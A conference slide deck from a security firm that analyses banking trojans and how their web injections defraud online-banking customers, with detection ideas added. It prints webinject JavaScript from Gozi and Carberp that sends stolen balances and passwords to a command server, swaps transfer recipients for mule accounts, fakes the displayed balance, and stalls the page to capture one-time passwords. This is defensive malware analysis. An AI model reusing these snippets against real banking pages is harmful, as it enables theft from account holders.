Don't fear the trojans; fear how they are configured to attack a banking website. A practical session with surprising outcomes

Transactional Banking Malware 



AusCERT 2011 
Presenter: Andreas Baumhof
CTO & co-Founder



2010 - the landscape is changing 



Security Paradigm is changing - are you?
(Banking) malware is changing - are you?
MITB, using the example of Gozi & Carberp



Defence Strategies 

■ Intelligence 
Following the money




Reporter: Why do you rob 
banks? 

Willie Sutton: Because that's 
where the money is. 

Willie Sutton stole more than $2 million... and spent half his life in prison.
Banking malware - the past



Phishing 

Was a viable threat in the past before 
dynamic password schemes, right??? 






Malware attacks 

■ are getting more widespread and malware easier to get hold of

Zeus, Spyeye, Carberp, Silon, Gozi, Mebroot, Clampi, URLZone, just to name a few

■ Available as an easy-to-use service 

Or even as a source code (Zeus) 
Current Security Paradigm



Most of the security solutions are reactive 
Usability vs. security 

■ Desktop Security 

■ blacklists vs. whitelists 

■ Dynamic Password Schemes (2FA) 

Authentication vs. Authorization vs. Security 

■ Forensics 

Almost all banking trojans are either a BHO or hook export / import tables (e.g. wininet.dll, nspr4.dll)

Browser Security model

■ DOM restrictions vs JSONP
Current Security Paradigm: Reactive



Most of the security solutions are reactive 
We don't solve the problem 

■ but try to mitigate the effects 

We make life harder for the bad guys 

■ That's all we do and thus we are far away from a 
solution 



BUT 



That forces the perpetrators to change, and leaves them exposed
Examples: Mebroot back in 2008



Mebroot will modify MBR (out of user mode) 
and restart the computer 

During the boot up process, Mebroot will load 
and inject the payload (mostly Torpig) into 
kernel drivers and user mode processes 



This made Mebroot one of the stealthiest 
Trojans of its time (back in 2008) 
Examples: Mebroot back in 2008



Lots of self-defense code

IRP hooks for \\Driver\Disk

■ Patches classpnp.sys!ClassInitialize

■ Creates "Watcher" Thread 

■ Direct disk sector write access 

BUT all this is only possible as Mebroot can 
write to the MBR / install a kernel driver! 
Examples: Mebroot vs Windows 7



Windows 7 introduced the UAC and also 
removed access to the MBR from usermode 

■ Bitlocker also protects the boot-up process. 

We obviously know that this won't stop the bad 
guys, but it is interesting to see the side effects 
this creates 

■ Either request admin privileges and the UAC will 
come up, or 

■ Do as much as possible from user mode. 



What did they decide to do? 



Commercial-in-Confidence
TrustDefender Labs



Examples: Torpig vs Windows 7 



In the last few months, we have seen samples of 
Torpig without Mebroot 

Works perfectly fine in Windows 7 

No UAC

Everything runs from usermode 

Browser hooking works nicely 

HTML web injection works like a treat 

Completely silent 



BUT 
Examples: Torpig vs Windows 7



No self defense at all anymore 

Torpig is visible as a process in task manager 

rundll32.exe C:\DOCUME~1\support\LOCALS~1\Temp\1.tmp,_IWMPEvents

Only the current user is infected, not the whole machine

If you kill that process, Torpig is disabled 

If you remove that file, Torpig is gone 

Other side effects 

■ If IE runs as a separate user, Torpig will not be able to 
inject its HTML code anymore! 
Examples: Zeus vs Windows 7



Similar approach for Zeus 2.x 

No UAC, Zeus runs as current logged in user, 
Browser hooking still possible 

■ BUT easily detectable and easily removable 

Almost no self defenses 

From the Zeus 2.0.9.8 manual:

2. Since the core of the bot is aimed at Windows Vista+, and the bot will never use privilege escalation, etc., bot is working within a single user. But the basic attempts to infect other Windows users are made (usually effective in cases of disabling UAC, or run from under LocalSystem).
Examples: Zeus vs Windows 7



Summary 

Windows 7 forced the bad guys to change tack, and leaves them exposed in userland

Easily detectable 

■ Easily removable 

■ Infect only the current user 



Easy fix: if you want to protect your browser session, run your browser as a separate user :-)
Examples: Internet based



Dynamic password schemes (2FA, ...)

Doesn't solve the problem, however it forces the bad 
guys to make use of heavy JavaScript injections into 
the banks website (MITB) 

■ And that e.g. forces them to use a valid HTTPS site 
with correct certificate for the C&C server. 

■ And that will leave more and more traces 



This raises the bar considerably 

GOOD: "script kiddies" get weeded out
BAD: that leaves solely the really bad guys
Good news (I guess...)



Online fraud is getting more complex 

Participants shown in the slide's diagram:

■ Malware writers
■ Account mules
■ Intellectual Property Development
  ■ Configuration file
  ■ Javascript / AJAX / JSONP backend
■ Money mules
■ Malware distributors
Banking malware is changing



Due to security improvements (client & server), 
the landscape is changing 

Trojan itself is becoming irrelevant 

■ "Industry-standard" webinject config format 

The main differentiating factor (and also the 
main Intellectual property) is 

■ the configuration file for each targeted brand, and 

■ The real-time dynamic content to adapt to the situation
What does that mean for multi-platform?



If 80% of the work is involved in the 
Intellectual Property... 

Of the configuration file, JavaScript, money mule 
accounts, account mule accounts, ... 



...this will naturally lead to cross-platform attacks as the trojan is merely an "enabler"

■ MacOSX (see our labs report), iOS, Android
■ HTML5???



Banking malware is changing



Trojan itself is not only irrelevant, BUT 

In order to protect the user, we don't have to 
defeat the physical trojan, rather the 
"infrastructure" behind it, e.g. 

■ if you kill the Torpig pipe ( \\\\.\\pipe\\!mscom$ ), Torpig is disabled



And the perpetrators leave traces 
Banking malware traces



[Screenshot: a bank's "Client Log on" page (User ID / Log-on help) with an injected extra "Mother's Maiden Name" field]

For additional form fields, they'll be sent as well to the real banking server

Check if you receive additional form fields!

Gozi will set a cookie that one could check 



    <html>
    <body onload="cook1=getCookie('googleblock'); if (cook1 !== null) { showBlock(); }">



Torpig will add a "&WCnt=0" to the POST request
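A server-side check for the two request traces just described, written as an added example for this page (it is not code from the talk or from TrustDefender): it flags form fields the bank's page never contained and the "&WCnt=0" parameter. The expected field names and the sample POST bodies are constructed for the example.

```javascript
// Added example (not from the original slides): a server-side check that flags
// two of the traces described above in a login POST body: form fields the bank
// never sent, and the "&WCnt=0" parameter the slide attributes to Torpig.
// Field names and sample bodies are constructed for this example.

// Fields the bank's genuine login form contains (assumption for this example).
const EXPECTED_LOGIN_FIELDS = new Set(["userId", "password", "submit"]);

// Parameters a trojan is known to append; "WCnt=0" is the Torpig marker
// mentioned in the talk.
const KNOWN_TROJAN_MARKERS = [{ name: "WCnt", value: "0", family: "Torpig" }];

// Inspect an application/x-www-form-urlencoded body and report anomalies.
// Returns { suspicious, extraFields, markers } so the caller can block,
// step up authentication, or just log the session for investigation.
function inspectLoginPost(body, expected = EXPECTED_LOGIN_FIELDS) {
  const params = new URLSearchParams(body);
  const extraFields = [];
  const markers = [];
  for (const [name, value] of params) {
    const marker = KNOWN_TROJAN_MARKERS.find(
      (m) => m.name === name && m.value === value
    );
    if (marker) {
      markers.push(marker.family);
    } else if (!expected.has(name)) {
      extraFields.push(name);
    }
  }
  return {
    suspicious: extraFields.length > 0 || markers.length > 0,
    extraFields,
    markers,
  };
}

// Constructed sample bodies: a clean login, and one submitted from an infected
// browser where the webinject added a "mother's maiden name" field and the
// trojan appended its marker.
const CLEAN_BODY = "userId=alice&password=s3cret&submit=Log+on";
const INJECTED_BODY =
  "userId=alice&password=s3cret&mothersMaidenName=Smith&submit=Log+on&WCnt=0";

console.log(inspectLoginPost(CLEAN_BODY));    // suspicious: false
console.log(inspectLoginPost(INJECTED_BODY)); // suspicious: true, extraFields ["mothersMaidenName"], markers ["Torpig"]
```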
Banking malware leaves traces




[Screenshot: Windows certificate dialog for the C&C host]

Certification path: COMODO > EssentialSSL CA > (leaf certificate)
Certificate status: This certificate has expired or is not yet valid.

Serial number: 00e2434de666ce42cab1...
Signature algorithm: sha1RSA
Signature hash algorithm: sha1
Valid from: Thursday, 26 August 2010
Valid to: Thursday, 25 November 2010
Subject: obscurestats.com, Free SSL, ...
Issuer:
  CN = EssentialSSL CA
  O = COMODO CA Limited
  L = Salford
  S = Greater Manchester
  C = GB
Banking malware - Gozi / Carberp



Let's look at some details of Gozi /Carberp 

There is a strong link between these two 
trojans 

■ Based on the type of specific JavaScript / HTML 
page injections found in both Trojans 

Based on information on seized C&C servers 
Banking malware - Gozi / Carberp



So how do these trojans work? 

■ We have covered this in various TrustDefender 
Labs in-depth reports, so just the highlights here 
The power of JavaScript



Gozi

    function CreateIFrame(url) {
        // hidden iframe used to call out to the C&C from inside the bank's page
        ifrm = document.createElement("IFRAME");
        ifrm.setAttribute("src", url);
        ifrm.style.width = /* size not legible in the slide */ + "px";
        ifrm.style.height = /* size not legible in the slide */ + "px";
        document.body.appendChild(ifrm);
        ifrm.src = url;
        return;
    }

    // URL fragment shown next to it on the slide (truncated):
    // ...hp?kaspersky_inetdate=" + t... currency + "&kaspersky_inetda...

Carberp

    function connect(src)
    {
        // load a remote script from the C&C into the bank's page
        var newScript = document.createElement("script");
        newScript.type = "text/javascript";
        newScript.src = src;
        var first = document.getElementsByTagName("head")[0].firstChild;
        document.getElementsByTagName("head")[0].insertBefore(newScript, first);
    }

    function sdata()
    {
        var lg = document.getElementById('login');
        var ps = document.getElementById('pass');
        var rix = (new Date()).getTime();
        if (ps.value.length > 3)
            connect("https://ob..." /* URL truncated in the slide; ends in ...t/access.php?make=auth... */);
        else
            alert("Indtast personligt kodeord");   // Danish: "Enter personal password"
    }
Some interesting features - Gozi



Gozi 

■ Among other things, it...

■ Will steal 2FA token and will use this in a second 
session 

Will do an automated wire transfer after login 
(user will only notice a 10 sec blank screen after 
login) 
Gozi - steal OTP and use it in 2nd session



■ Inject intermediate page

■ Steal OTP and send it to C&C server

■ 2nd session from C&C server
Gozi - steal OTP and use it in 2nd session

[Screenshot: "Business Online Login" in Internet Explorer, showing the injected intermediate page:]

Please wait while we are checking some additional security parameters.
This may take few minutes to complete.

Security Token Verification
PIN & Token Password: [input]
*Press white button on your Token to display Token Password.
» CONTINUE
Gozi - fully automated wire transfer




■ Hook into the page loading process

■ If (PAGE == LOGIN)

■ CreateIFrame and send balance, amount, currency to C&C

■ Click on "pay":

    setTimeout('document.getElementById("level_4_2").click()', 100);

■ Click on intl wire transfer:

    top.window.setTimeout('clickButton(top.frames[i].document.getElementById("gkkLocalNavigation").getElementsByTagName("a")[2])', 50);

■ Many more simulated clicks
Some interesting features - Carberp



Carberp 

■ Will change recipient details in real-time and uses the provided OTP to approve them

■ Steals OTPs in real time for use in a separate session
Carberp - real-time recipient change



■ Hook wire transfer button
  Through a JavaScript onclick event handler

■ Save original recipient details
  This is used later on to fix up the account balance, and to replace the fraudulent transaction with the intended one in the account statements

■ Send details to C&C and request mule account details
  Money mule account is dependent on user account, bank identifier and transfer amount

■ Change recipient details to mule account
  They even make sure that this is going to be an immediate transaction

■ Submit the changed details to bank
Carberp - permanent storage



    window.onload = function ()
    {
        var total = document.getElementById("cashTotalAvailBalance");
        if (total != null)
        {
            // strip currency sign and thousands separator, then send the balance off
            total = total.innerHTML.replace("$", "");
            total = total.replace(",", "");
            sdata(total);
        }
    };
Carberp - save info from C&C



    // mule recipient details from the C&C response are stored client-side via ud()
    // (the 365 presumably being a lifetime in days)
    ud(1, 'dr_name', response.dr_name, 365);
    ud(1, 'dr_konto', response.dr_konto, 365);
    ud(1, 'dr_blz', response.dr_blz, 365);
    ud(1, 'dr_komm', response.dr_komm, 365);
    ud(1, 'dr_summ', response.dr_summ, 365);
Carberp - alter transaction



    // overwrite the user's recipient, account, bank id, amount and reference with the mule's
    document.getElementById('recipient').value = dr_name;
    document.getElementById('recipientAccount').value = dr_konto;
    document.getElementById('recipientBankid').value = dr_blz;
    document.getElementById('amount').value = fpztiz(dr_summ);
    document.getElementById('reference1').value = dr_komm;
Carberp - alter account balance



    var st = document.getElementsByTagName('td');
    for (var y = 0; y < st.length; y++) {
        if (st[y].className.match(/posSaldo|negSaldo/)) {
            var sal = st[y].innerHTML.match(/[-\d\.,]+/);
            if (dr_summ && ud(2, 'on') && ud(2, 'on') == '0') {
                // German number format: drop the thousands separator, comma becomes decimal point
                sal = Number(sal[0].replace(/\./, '').replace(',', '.'));
                var sd = alls(dr_summ, 'x');
                var nv = fpztiz(sal + sd);   // re-format and write the "corrected" balance back
                st[y].innerHTML = nv;
            }
        }
    }
Carberp - stealing of OTP



"simulation" of page reload upon OTP 
submission 

■ "You cannot sign on using the data you entered. 
Please wait for your Token to update then make 
corrections and try again." 

■ Page load is timed to take 60 seconds to make 
sure there'll be a new OTP 

This one blew us away... You have to see this live...
Carberp - stealing of OTP

[Screenshot: business banking sign-on page (User ID / Password / Token / Sign On) with the status bar showing "javascript:clickNumber(0)"]

The status bar will be set to "waiting for businessaccess..." and a page reload will be simulated via JavaScript (all content elements made invisible and shown within a 60 second timeframe to make sure a new OTP is submitted)... wow...
Carberp - stealing OTP



    window.status = "Waiting for https://bankname.com/signon.do...";

    var els = document.getElementsByTagName("td");

    for (var i = 0; i < els.length; i++)
    {
        els[i].style.display = "none";   // hide every cell, to be re-shown one by one
        currels = i;
    }
    xtime = 60000 / currels;   // spread the re-showing over 60 seconds, so a fresh OTP is due
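A server-side rule for this pattern, written as an added example for this page (not code from the talk or from TrustDefender): while the victim waits out the simulated reload, the OTP they already typed is consumed by a separate session, so the bank sees two successful OTP logins for one user from two different clients within about a minute. The event fields, client fingerprints and the 120-second window are assumptions; the log is constructed.

```javascript
// Added example (not from the original slides): a server-side rule for the
// pattern shown above, where the OTP typed into the injected page is consumed
// by a second session while the victim is held on the simulated 60-second
// reload. Event fields and the 120-second window are assumptions.

const WINDOW_SECONDS = 120; // comfortably covers the 60 s reload trick

// Constructed authentication log. "alice": the C&C-driven session logs in
// with the first stolen OTP from an unknown client, then the victim logs in
// with the next OTP 60 s later. "bob": a normal logout/re-login from one
// device, which must not alert. Failed attempts are ignored.
const CONSTRUCTED_AUTH_EVENTS = [
  { user: "alice", ts: 1005, client: "fp-unknown-1", otp: "482913", ok: true },
  { user: "bob", ts: 1010, client: "fp-bob-laptop", otp: "113377", ok: true },
  { user: "carol", ts: 1020, client: "fp-carol", otp: "000000", ok: false },
  { user: "alice", ts: 1065, client: "fp-victim-pc", otp: "771024", ok: true },
  { user: "bob", ts: 1100, client: "fp-bob-laptop", otp: "905512", ok: true },
];

// Return one alert per pair of successful OTP logins for the same user that
// fall within the window but come from different client fingerprints.
function findConcurrentOtpSessions(events, windowSeconds = WINDOW_SECONDS) {
  const byUser = new Map();
  for (const e of events) {
    if (!e.ok) continue;
    if (!byUser.has(e.user)) byUser.set(e.user, []);
    byUser.get(e.user).push(e);
  }
  const alerts = [];
  for (const [user, logins] of byUser) {
    logins.sort((a, b) => a.ts - b.ts);
    for (let i = 0; i < logins.length; i++) {
      for (let j = i + 1; j < logins.length; j++) {
        const earlier = logins[i];
        const later = logins[j];
        if (later.ts - earlier.ts > windowSeconds) break; // sorted, so no more pairs
        if (earlier.client !== later.client) {
          alerts.push({
            user,
            clients: [earlier.client, later.client],
            secondsApart: later.ts - earlier.ts,
          });
        }
      }
    }
  }
  return alerts;
}

console.log(findConcurrentOtpSessions(CONSTRUCTED_AUTH_EVENTS));
// one alert: alice, fp-unknown-1 then fp-victim-pc, 60 seconds apart
```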
Side effects of Mobile Attacks: Example Zeus/Spyeye MITMO



[Screenshot of the injected page (Spanish), translated:]

IMPORTANT INFORMATION ABOUT SECURITY

Please choose the make and model of your phone
Nokia / 5130 XpressMusic
What if the phone is not in the list?
Your phone: Nokia 5130 XpressMusic
The registered phone number: [input]

The link for installing the mobile digital certificate will be sent to your number by SMS. Once you receive the SMS with the link, please download and install the application.
Side effects of Mobile Attacks: Example Zeus/Spyeye MITMO



Zeus/Spyeye MITMO

■ Zeus MITMO is not designed to steal credentials 
from the mobile device, BUT 

■ To attack the authentication system 



BUT 



Spyeye had to ask for the IMEI, as they would send a Blackberry/Symbian file signed with a developer certificate which is tied to a particular IMEI!
What's missing?



Fraudsters are getting smarter. 
Trojans are getting smarter 

Are we getting smarter as well? 

Do we know what the trojan does in a particular 
situation? 

Security vs fraud risk management 

Detect fraudulent activity BEFORE it happens 






Detection & Protection 



Detection vs Protection

Protection

■ Endpoint security is essential as no server component is attacked at all

Intelligence is key (do you know what's happening?)

■ Seizure of C&C servers (most effective)
■ Bot simulation
■ (JavaScript) forensics
■ Account Monitoring
Intelligence: seizure of C&C server



Provides the biggest benefit as it becomes 
very clear what data has been compromised 
and what harm has been done. 



However, not that easy to do

■ Use of proxies
■ Involves LE (law enforcement)
Intelligence: bot simulation



Script that logs in to the bank account and simulates a wire transfer

Trying to get mule accounts from the server

Problems

■ Easily detectable
■ Fake mules
Intelligence: account monitoring



In addition to money mules, the perpetrators need to have account mules

Those are legitimate accounts that are being made available to come up with the configuration

Has unique characteristics

■ Lots of logins / logouts without doing anything

■ Pressing a button lots of times repeatedly

■ Create a wire transfer and delete it soon thereafter

■ Lots of very small wire transfers (just a few $)
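The four characteristics above, turned into a scoring rule over a session log, as an added example for this page (not code from the talk or from TrustDefender). The session and action shapes, the thresholds and the "few $" limit are assumptions, and the log is constructed.

```javascript
// Added example (not from the original slides): scoring the behaviours the
// slide lists as characteristic of account mules, run over a constructed
// session log. Event names, thresholds and the "few $" limit are assumptions.

const TINY_TRANSFER_LIMIT = 5;  // "just a few $"
const REPEAT_CLICK_LIMIT = 10;  // same button pressed this often in one session

// Count the four signals per account. Each session lists the ordered actions
// taken between login and logout; an empty list is a login/logout with
// nothing done.
function accountMuleSignals(sessions) {
  const signals = new Map();
  for (const s of sessions) {
    const sig = signals.get(s.account) ||
      { emptyLogins: 0, repeatedClicks: 0, createThenDelete: 0, tinyTransfers: 0 };
    if (s.actions.length === 0) sig.emptyLogins++;
    const clicks = new Map();   // button id -> presses in this session
    const created = new Set();  // transfer refs created in this session
    for (const a of s.actions) {
      if (a.type === "click") {
        clicks.set(a.id, (clicks.get(a.id) || 0) + 1);
      } else if (a.type === "create_transfer") {
        created.add(a.ref);
      } else if (a.type === "delete_transfer" && created.has(a.ref)) {
        sig.createThenDelete++;
      } else if (a.type === "submit_transfer" && a.amount <= TINY_TRANSFER_LIMIT) {
        sig.tinyTransfers++;
      }
    }
    for (const n of clicks.values()) if (n >= REPEAT_CLICK_LIMIT) sig.repeatedClicks++;
    signals.set(s.account, sig);
  }
  return signals;
}

// Flag an account when at least two of the four signals are present; any one
// of them on its own is too common among genuine customers.
function isLikelyAccountMule(sig) {
  const hits = [sig.emptyLogins >= 3, sig.repeatedClicks >= 1,
                sig.createThenDelete >= 1, sig.tinyTransfers >= 3];
  return hits.filter(Boolean).length >= 2;
}

// Constructed log: "acct-mule" is used to explore the site for the webinject
// configuration; "acct-normal" pays one bill.
const click = (id) => ({ type: "click", id });
const CONSTRUCTED_SESSIONS = [
  { account: "acct-mule", actions: [] },
  { account: "acct-mule", actions: [] },
  { account: "acct-mule", actions: [] },
  { account: "acct-mule", actions: Array.from({ length: 12 }, () => click("btnContinue")) },
  { account: "acct-mule", actions: [
      { type: "create_transfer", ref: "t1", amount: 100 },
      { type: "delete_transfer", ref: "t1" },
      { type: "submit_transfer", amount: 1 },
      { type: "submit_transfer", amount: 2 },
      { type: "submit_transfer", amount: 3 } ] },
  { account: "acct-normal", actions: [click("btnPay"), { type: "submit_transfer", amount: 850 }] },
];
```

Calling `accountMuleSignals(CONSTRUCTED_SESSIONS)` and then `isLikelyAccountMule` on each entry flags only "acct-mule".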
Intelligence: account mule detection



We can learn a lot by monitoring these accounts

Account mules often have a very different relationship with the perpetrators than the money mules

Typically it's a very trusted and long-term relationship

■ While money mules are not

■ See e.g. Top 10 ways to get fired as a money mule
( http://krebsonsecurity.com/2010/01/top-10-ways-to-get-fired-as-a-money-mule/ )
Intelligence: JavaScript forensics



Use JavaScript within the banking session to 
gather intelligence 

■ Presence of malware signature 

(such as cookies, ...) 



    <html>
    <body onload="cook1=getCookie('googleblock'); if (cook1 !== null) { showBlock(); }">



■ Money mules account detail gathering 

■ Account mule detail gathering 

Problems 

Signature /configuration based 




We need to make a difference 



Why can these trojans talk to a third party within 
the banking session? 

■ Safe Web Browsing initiative from FSTC/BITS would 
have addressed this (back in 2007) 

Intelligence 

■ Information sharing not just of trojans, but also about 
what they do anonymously (e.g. account, devices, 
money mules, account mules, ...) 



Integrating Security & fraud risk management 
So where from here?



The problem is here to stay 
We can choose two ways 

■ Either security controls are implemented to solve 
the problem 

■ Or "just" to make it go away

■ Bad guys don't have brand loyalty

■ Bad guys don't care about the colour of money

"I don't have to outrun the bear, I just have to outrun you"
Questions?
TrustDefender



More information can be found on our blog 
(a) http://www.trustdefender.com/blog 

Speaker 

■ Andreas Baumhof 

■ Email: andreas(a)trustdefender.com 

■ Phone: +61428 224403 